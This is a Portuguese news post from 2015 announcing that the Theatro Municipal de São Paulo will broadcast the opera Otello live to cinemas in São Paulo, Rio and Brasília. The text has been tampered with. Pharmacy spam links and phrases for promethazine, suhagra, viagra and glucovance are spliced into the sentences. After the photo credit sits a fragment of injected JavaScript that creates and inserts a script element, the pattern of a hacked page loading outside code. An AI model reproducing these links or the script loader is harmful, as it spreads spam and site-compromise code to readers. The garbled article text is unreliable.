Escrito por em 19 mar 2015 nas áreas Cinema, Distrito Federal, Notícia, Ópera, Rio de Janeiro, São Paulo

Pela primeira vez uma produção lírica nacional será transmitida ao vivo nos cinemas.

 

A Fundação Theatro Municipal de SP (FTM) e o Instituto Brasileiro de Gestão Cultural (IBGC) lançam, no dia 24 de março, o projeto Municipal ao Vivo, iniciativa pioneira na transmissão para cinemas de óperas produzidas no Brasil. Em parceria com a empresa Cinelive, a ópera Otello http://www.eoli.se/bilder/cheapest-promethazine/ será exibida em salas de São Paulo, Rio de Janeiro e Brasília, em alta definição e com som de alta fidelidade. As sessões, no entanto, serão apenas para convidados.

Quem acompanha o universo da música lírica sabe que já é possível assistir em telonas brasileiras as produções operísticas do Metropolitan nova-iorquino ou da Royal Opera House, de Londres. Mas esta será a primeira vez que o público poderá vivenciar algo semelhante a partir de uma montagem brasileira.

A transmissão é parte do projeto Municipal Digital Cheap , que explora tecnologias de informação e comunicação digitais para oferecer ao maior número possível de pessoas os conteúdos produzidos pela FTM e IBGC, ampliando o acesso a espetáculos artísticos de excelência.

A primeira transmissão ocorrerá em caráter experimental. “Nesse campo da arte e tecnologia, é necessário descobrir caminhos”, afirma José Luiz Herencia, diretor-geral da FTM. “Mas estamos trabalhando para oferecer uma experiência de ponta, próxima ao que almejamos para a temporada regular”.

Para o diretor executivo do IBGC, William Nacked, “o projeto Municipal Digital nos permitirá democratizar o acesso às produções do Theatro”. A proposta, futuramente, é que os espetáculos do Municipal sejam transmitidos para salas do circuito municipal de cinemas que está sendo criado nos equipamentos públicos de São Paulo, em especial na periferia da cidade.

Pills “Além dos 1.500 lugares que oferecemos presencialmente, estamos propondo uma nova modalidade de apresentar nossas óperas e concertos. É a concretização de um plano audacioso” buy suhagra 100 mg online , afirma o diretor artístico John Neschling, que rege a apresentação.

 
viagra online safe forum buy Buy

Relembre a crítica de Leonardo Marques para Otello http://osobnipruvodce.com/2018/02/02/glucovance-price-in-egypt/

 

Foto do post: Heloísa Ballarinidocument.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

Faça seu comentário